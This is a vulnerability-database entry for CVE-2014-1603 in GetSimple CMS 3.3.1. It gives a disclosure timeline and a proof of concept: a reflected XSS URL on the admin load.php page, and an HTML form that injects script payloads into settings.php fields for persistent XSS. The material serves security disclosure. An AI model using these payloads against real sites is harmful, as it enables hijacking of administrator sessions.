Lucene search
K

GetSimple CMS 3.3.1 Cross Site Scripting

🗓️ 13 May 2014 00:00:00Reported by Pedro RibeiroType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

GetSimple CMS 3.3.1 XSS in Admin Console

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-1603
14 May 201419:00
cve
Cvelist
CVE-2014-1603
14 May 201419:00
cvelist
Exploit DB
GetSimple CMS 3.3.1 - Cross-Site Scripting
12 Oct 201400:00
exploitdb
EUVD
EUVD-2014-1679
7 Oct 202500:30
euvd
exploitpack
GetSimple CMS 3.3.1 - Cross-Site Scripting
12 Oct 201400:00
exploitpack
NVD
CVE-2014-1603
14 May 201419:55
nvd
Prion
Cross site scripting
14 May 201419:55
prion
`PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1  
CVE-2014-1603  
by Pedro Ribeiro ([email protected]) from Agile Information Security  
  
Timeline:  
04/11/2013 - Found bugs, produced proof of concept.  
05/11/2013 - Communicated to the developer, which acknowledged receipt.  
10/01/2014 - Politely asked the developer for progress, no response.  
17/01/2014 - Received CVE number from MITRE.  
20/01/2014 - Communicated CVE number to the developer, no response.  
29/01/2014 - Politely asked the developer for progress, no response.  
12/05/2014 - Public release.  
==============================  
  
Reflected XSS in plugin load page:  
http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data&param="><script>alert(1)</script>  
  
Persistent XSS in settings page:  
<form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">  
<input type="text" name="user" value=""><script>alert(1);</script>">  
<input type="text" name="email" value=""><script>alert(2);</script>">  
<input type="text" name="name" value=""><script>alert(3);</script>">  
<input type="hidden" name="submitted" value="Save Settings">  
<input type="submit" value="Submit">  
</form>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation